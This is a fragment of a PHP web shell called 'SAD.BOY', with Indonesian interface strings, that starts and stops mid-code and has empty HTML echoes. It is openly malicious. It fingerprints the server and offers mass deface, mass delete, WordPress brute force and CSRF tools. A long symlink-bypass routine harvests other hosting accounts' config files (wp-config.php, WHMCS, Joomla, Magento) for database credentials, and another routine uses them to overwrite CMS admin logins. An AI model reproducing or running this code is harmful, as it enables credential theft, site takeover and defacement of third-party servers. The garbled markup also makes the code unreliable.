= 1073741824)
return sprintf('%1.2f', $s / 1073741824).' GB';
elseif ($s >= 1048576)
return sprintf('%1.2f', $s / 1048576) .' MB';
elseif ($s >= 1024)
return sprintf('%1.2f', $s / 1024) .' KB';
else
return $s .' B';
}
if(get_magic_quotes_gpc()) {
function jas_ss($array) {
return is_array($array) ? array_map('jas_ss', $array) : stripslashes($array);
}
$_POST = jas_ss($_POST);
$_COOKIE = jas_ss($_COOKIE);
}
$kernel = php_uname();
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$freespace = hdd(disk_free_space("/"));
$total = hdd(disk_total_space("/"));
$used = $total - $freespace;
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "ON" : "OFF";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "ON" : "OFF";
$curl = (function_exists('curl_version')) ? "ON" : "OFF";
$wget = (exe('wget --help')) ? "ON" : "OFF";
$perl = (exe('perl --help')) ? "ON" : "OFF";
$python = (exe('python --help')) ? "ON" : "OFF";
$show_ds = (!empty($ds)) ? "$ds" : "NONE";
if (!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo '
SAD.BOY
IP:
'.$ip.'
My IP:
'.$_SERVER['REMOTE_ADDR'].'
User:
'.$user.' ['.$uid.']
Group:
'.$group.' ['.$gid.']
HDD:
'.$used.'/'.$total.'
Free:
'.$freespace.'
Software:
'.$_SERVER['SERVER_SOFTWARE'].'
Safe Mode:
'.$sm.'
PHP Version:
'.phpversion().'
Disable Functions:
'.$show_ds.'
MySql:
'.$mysql.'|Perl: '.$perl.'|Python: '.$python.'
WGET:
'.$wget.'|CURL: '.$curl.'
System:
'.$kernel.'
';
/*new file*/
if(isset($_POST['simpanaja'])){
$buat_file = $action.'/'.htmlspecialchars($_POST['buat_file']);
$fp = fopen($buat_file, "a+");
if($fp){
echo '';
} else {
echo "Gagal Menambah File Baru";
}
}
/*new dir*/
if(isset($_POST['simpan'])){
$mkdir = $action.'/'.$_POST['buat_dir'];
$buat_dir = mkdir($mkdir);
if($buat_dir){
echo "Folder Telah Di-buat";
} else {
echo "Gagal Menambah Folder";
}
}
/*All menu tools Shell*/
/*zoneh*/
if ($_GET['menu'] == 'zoneh') {
echo '";
}
/*Mass Deface*/
} elseif($_GET['menu'] == 'mass_deface'){
echo '';
}
/*Mass Delete*/
} elseif($_GET['menu'] == 'mass_delete'){
echo '';
}
/*WordPress BruteForce*/
} elseif($_GET['menu'] == 'wpbf'){
echo '';
class Wp{
private $url_target;
private $username;
private $open;
private $wordlist;
public function form() {
echo '
';
echo '';
/*csrf exploiter*/
} elseif($_GET['menu'] == 'csrf'){
echo '';
echo '';
$url_target = $_POST['url'];
$post_file = $_POST['post_file'];
$kunci_target = $_POST['kunci_target'];
if($kunci_target){
echo "
";
}
/*adminer*/
} elseif($_GET['menu'] == 'adminer') {
echo '";
/*Admin Finder*/
} elseif($_GET['menu'] == 'admin_finder'){
echo '";
}
/*Bypass Symlink 500 Internal*/
} elseif($_GET['menu'] == 'bypass_sym'){
echo '';
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
echo '';
exit;
} else {
if ($_POST['conf']) {
$home = $_POST['home'];
$folfig = $home;
@mkdir($folfig, 0755);
@chdir($folfig);
$htaccess = $_POST['4LF45T'];
file_put_contents(".htaccess", $htaccess, FILE_APPEND);
$passwd = explode("\n", $_POST["passwd"]);
foreach ($passwd as $pwd) {
$user = trim($pwd);
symlink('/', 'Symlink_V2');
copy('/'.$home.'/'.$user.'/.my.cnf', $user.' CPANEL');
symlink('/'.$home.'/'.$user.'/.my.cnf', $user.' CPANEL');
copy('/'.$home.'/'.$user.'/.accesshash', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/.accesshash', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/suspended.page/index.html', $user.' RESELLER.txt');
symlink('/'.$home.'/'.$user.'/public_html/suspended.page/index.html', $user.' RESELLER.txt');
symlink('/'.$home.'/'.$user.'/public_html/.accesshash', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/configuration.php', $user.' WHMCS or JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/account/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/accounts/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/buy/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/checkout/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/central/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/clienti/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/client/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/cliente/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/clientes/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/clients/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/client-area/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/core/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/company/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/customer/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/customers/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/bill/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/billing/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/finance/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/host/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/hosts/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/hosting/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/hostings/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/klien/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/manage/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/manager/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/member/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/members/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/my/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/order/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/orders/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/painel/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/panel/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/panels/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/portals/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/purchase/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/secure/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/support/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/supporte/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/supports/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/web/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/webhost/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/whm/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/Whm/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/WHM/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/configuration.php', $user.' WHMCS or JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/account/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/accounts/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/buy/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/checkout/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/central/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/clienti/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/client/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/cliente/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/clientes/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/clients/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/clientarea/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/clientsarea/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/client-area/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/clients-area/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/clientzone/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/client-zone/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/core/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/company/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/customer/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/customers/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/bill/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/billing/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/finance/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/financeiro/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/host/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/hosts/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/hosting/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/hostings/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/klien/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/manage/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/manager/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/member/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/members/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/my/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/myaccount/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/my-account/client/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/myaccounts/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/my-accounts/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/order/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/orders/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/painel/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/panel/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/panels/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/portals/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/purchase/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/secure/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/support/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/supporte/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/supports/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/web/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/webhost/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/webhosting/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/whm/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/whmcs/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/whmcs2/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/Whm/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/Whmcs/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/WHM/configuration.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/WHMCS/configuration.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/blog/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/beta/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/portal/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/site/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/wp/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/WP/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/news/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/test/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/demo/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/home/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/v1/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/v2/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/press/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/new/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php', $user.'WORDPRESS.txt');
copy('/'.$home.'/'.$user.'/public_html/blog/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/submitticket.php', $user.'WHMCS.txt');
copy('/'.$home.'/'.$user.'/public_html/cms/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/beta/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/portal/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/site/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/main/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/home/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/demo/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/test/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/v1/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/v2/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/joomla/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/new/configuration.php', $user.'JOOMLA.txt');
copy('/'.$home.'/'.$user.'/public_html/app/etc/local.xml', $user.' MAGENTO.txt');
copy('/'.$home.'/'.$user.'/public_html/config/settings.inc.php', $user.' PRESTASHOP.txt');
symlink('/'.$home.'/'.$user.'/public_html/wp/test/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/blog/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/beta/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/portal/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/site/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/wp/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/WP/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/news/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/wordpress/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/test/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/demo/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/home/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/v1/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/v2/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/press/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/new/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/blogs/wp-config.php', $user.'WORDPRESS.txt');
symlink('/'.$home.'/'.$user.'/public_html/blog/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/submitticket.php', $user.'WHMCS.txt');
symlink('/'.$home.'/'.$user.'/public_html/cms/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/beta/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/portal/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/site/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/main/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/home/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/demo/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/test/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/v1/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/v2/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/joomla/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/new/configuration.php', $user.'JOOMLA.txt');
symlink('/'.$home.'/'.$user.'/public_html/app/etc/local.xml', $user.' MAGENTO.txt');
symlink('/'.$home.'/'.$user.'/public_html/config/settings.inc.php', $user.' PRESTASHOP.txt');
copy('/'.$home.'/'.$user.'/public_html/application/config/database.php', $user.' ELLISLAB.txt');
copy('/'.$home.'/'.$user.'/public_html/admin/config.php', $user.' OPENCART.txt');
copy('/'.$home.'/'.$user.'/public_html/default/settings.php', $user.' DRUPAL.txt');
copy('/'.$home.'/'.$user.'/public_html/forum/config.php', $user.' PHPBB.txt');
symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php', $user.' ELLISLAB.txt');
symlink('/'.$home.'/'.$user.'/public_html/admin/config.php', $user.' OPENCART.txt');
symlink('/'.$home.'/'.$user.'/public_html/default/settings.php', $user.' DRUPAL.txt');
symlink('/'.$home.'/'.$user.'/public_html/forum/config.php', $user.' PHPBB.txt');
copy('/'.$home.'/'.$user.'/public_html/vb/includes/config.php', $user.' VBULLETIN.txt');
copy('/'.$home.'/'.$user.'/public_html/includes/config.php', $user.' VBULLETIN.txt');
copy('/'.$home.'/'.$user.'/public_html/forum/includes/config.php', $user.' VBULLETIN.txt');
copy('/'.$home.'/'.$user.'/public_htm/config.php', $user.' OTHER.txt');
copy('/'.$home.'/'.$user.'/public_htm/html/config.php', $user.' PHPNUKE.txt');
symlink('/'.$home.'/'.$user.'/public_html/vb/includes/config.php', $user.' VBULLETIN.txt');
symlink('/'.$home.'/'.$user.'/public_html/includes/config.php', $user.' VBULLETIN.txt');
symlink('/'.$home.'/'.$user.'/public_html/forum/includes/config.php', $user.' VBULLETIN.txt');
symlink('/'.$home.'/'.$user.'/public_htm/config.php', $user.' OTHER.txt');
symlink('/'.$home.'/'.$user.'/public_htm/html/config.php', $user.' PHPNUKE.txt');
copy('/'.$home.'/'.$user.'/public_htm/conn.php', $user.' OTHER.txt');
symlink('/'.$home.'/'.$user.'/public_html/conn.php', $user.' OTHER.txt');
symlink('/'.$home.'/'.$user.'/public_html/inc/config.inc.php', $user.' OTHER.txt');
copy('/'.$home.'/'.$user.'/public_html/application/config/database.php', $user.' OTHER.txt');
symlink('/'.$home.'/'.$user.'/public_html/application/config/database.php', $user.' OTHER.txt');
copy('/'.$home.'/'.$user.'/public_html/inc/config.inc.php', $user.' OTHER.txt');
copy('/var/www/wp-config.php', 'WORDPRESS.txt');
copy('/var/www/configuration.php', 'JOOMLA.txt');
copy('/var/www/config.inc.php', 'OPENJOURNAL.txt');
copy('/var/www/config.php', 'OTHER.txt');
copy('/var/www/config/koneksi.php', 'OTHER.txt');
copy('/var/www/include/config.php', 'OTHER.txt');
copy('/var/www/connect.php', 'OTHER.txt');
copy('/var/www/config/connect.php', 'OTHER.txt');
copy('/var/www/include/connect.php', 'OTHER.txt');
copy('/var/www/html/wp-config.php', 'WORDPRESS.txt');
copy('/var/www/html/configuration.php', 'JOOMLA.txt');
copy('/var/www/html/config.inc.php', 'OPENJOURNAL.txt');
copy('/var/www/html/config.php', 'OTHER.txt');
copy('/var/www/html/config/koneksi.php', 'OTHER.txt');
copy('/var/www/html/include/config.php', 'OTHER.txt');
copy('/var/www/html/connect.php', 'OTHER.txt');
copy('/var/www/html/config/connect.php', 'OTHER.txt');
copy('/var/www/html/include/connect.php', 'OTHER.txt');
symlink('/var/www/wp-config.php', 'WORDPRESS.txt');
symlink('/var/www/configuration.php', 'JOOMLA.txt');
symlink('/var/www/config.inc.php', 'OPENJOURNAL.txt');
symlink('/var/www/config.php', 'OTHER.txt');
symlink('/var/www/config/koneksi.php', 'OTHER.txt');
symlink('/var/www/include/config.php', 'OTHER.txt');
symlink('/var/www/connect.php', 'OTHER.txt');
symlink('/var/www/config/connect.php', 'OTHER.txt');
symlink('/var/www/include/connect.php', 'OTHER.txt');
symlink('/var/www/html/wp-config.php', 'WORDPRESS.txt');
symlink('/var/www/html/configuration.php', 'JOOMLA.txt');
symlink('/var/www/html/config.inc.php', 'OPENJOURNAL.txt');
symlink('/var/www/html/config.php', 'OTHER.txt');
symlink('/var/www/html/config/koneksi.php', 'OTHER.txt');
symlink('/var/www/html/include/config.php', 'OTHER.txt');
symlink('/var/www/html/connect.php', 'OTHER.txt');
symlink('/var/www/html/config/connect.php', 'OTHER.txt');
symlink('/var/www/html/include/connect.php', 'OTHER.txt');
}
echo '
Bypass Symlink Berhasil';
} else {
echo "
";
}
}
/*Auto edit user*/
} elseif($_GET['menu'] == 'auto_edit_users'){
echo '';
if($_POST['submit']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
echo "
username Dan password harus lebih dari 6 karakter";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result['id'];
$site = ambilkata($config,"sitename = '","'");
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
echo "
Config => ".$file_conf."";
echo "
CMS => Joomla
";
if($site == '') {
echo "
Sitename => ERROR, Gagal Mengambil Domain";
} else {
echo "
Sitename => $site";
}
if(!$update OR !$conn OR !$db) {
echo "
Status => ".mysql_error()."";
} else {
echo "
Status => sukses, silakan login dengan user & pass yang baru.";
}
mysql_close($conn);
} elseif(preg_match("/WordPress/",$config)) {
$dbhost = ambilkata($config,"DB_HOST', '","'");
$dbuser = ambilkata($config,"DB_USER', '","'");
$dbpass = ambilkata($config,"DB_PASSWORD', '","'");
$dbname = ambilkata($config,"DB_NAME', '","'");
$dbprefix = ambilkata($config,"table_prefix = '","'");
$prefix = $dbprefix."users";
$option = $dbprefix."options";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
$result = mysql_fetch_array($q);
$id = $result[ID];
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
$result2 = mysql_fetch_array($q2);
$target = $result2[option_value];
if($target == '') {
$url_target = "
Login => ERROR, Gagal Mengambil Domain";
} else {
$url_target = "
Login => $target/wp-login.php";
}
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
echo "
Config => ".$file_conf."";
echo "
CMS => Wordpress";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "
Status => ".mysql_error()."";
} else {
echo "
Status => sukses, silakan login dengan user & pass yang baru.";
}
mysql_close($conn);
} elseif(preg_match("/Magento|Mage_Core/",$config)) {
$dbhost = ambilkata($config,"
");
$dbuser = ambilkata($config,"
");
$dbpass = ambilkata($config,"
");
$dbname = ambilkata($config,"
");
$dbprefix = ambilkata($config,"
");
$prefix = $dbprefix."admin_user";
$option = $dbprefix."core_config_data";
$conn = mysql_connect($dbhost,$dbuser,$dbpass);
$db = mysql_select_db($dbname);
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
$result = mysql_fetch_array($q);
$id = $result[user_id];
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
$result2 = mysql_fetch_array($q2);
$target = $result2[value];
if($target == '') {
$url_target = "
Login => ERROR, Gagal Mengambil Domain";
} else {
$url_target = "
Login => $target/admin/";
}
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
echo "
Config => ".$file_conf."";
echo "
CMS => Magento";
echo $url_target;
if(!$update OR !$conn OR !$db) {
echo "
